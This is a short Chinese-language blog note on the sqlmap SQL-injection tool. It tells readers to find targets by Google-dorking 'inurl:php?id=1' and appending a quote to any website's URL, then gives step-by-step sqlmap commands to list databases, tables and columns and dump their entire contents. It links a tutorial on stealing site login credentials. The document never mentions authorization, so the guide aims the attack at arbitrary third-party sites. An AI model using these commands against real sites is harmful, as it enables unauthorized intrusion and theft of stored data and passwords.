[Python] sqlmap

程式語言:Python 2.6.x or 2.7.x
工具:sqlmap
官網
官方 GitHub
官方指令表(善用 google 翻譯)

功能:SQL injection test

簡易尋找目標
  1. google 搜尋 inurl:php?id=1
  2. 任意網頁,在網址後加上 ' ,看是否有錯誤訊息
  3. 有錯誤訊息,即可嘗試

簡易測試方法 
  1. // 列出資料庫
  2. python2.7 sqlmap.py -u "網址" --dbs
  3.  
  4. // 用前一個指令找到的資料庫,找其內部的 tables,可用逗號分隔
  5. python2.7 sqlmap.py -u "網址" -D "資料庫" --tables
  6.  
  7. // 用前一個指令找到的 tableName,找其內部的 columns
  8. python2.7 sqlmap.py -u "網址" -D "資料庫" -T "tableName" --columns
  9.  
  10. // 將前一個指令找到的 columnName 的資料全部下載
  11. python2.7 sqlmap.py -u "網址" -D "資料庫" -T "tableName" -C "columnName" --dump
  12.  
  13. // -D 可多個尋找,將數據庫名稱以逗號分隔
  14. // -T 可多個尋找,將 table 名稱以逗號分隔
  15. // -C 可多個尋找,將 column 名稱以逗號分隔
  16.  
  17. // 尋找任意名字,也可用逗號分隔,表示 OR
  18. python2.7 sqlmap.py -u "網址" --search -D "關鍵字" -T "關鍵字" -C "關鍵字"

參考

[入侵網頁] SQLMAP的實戰教學 輕鬆獲取網頁登入帳號及密碼!!!

留言

張貼留言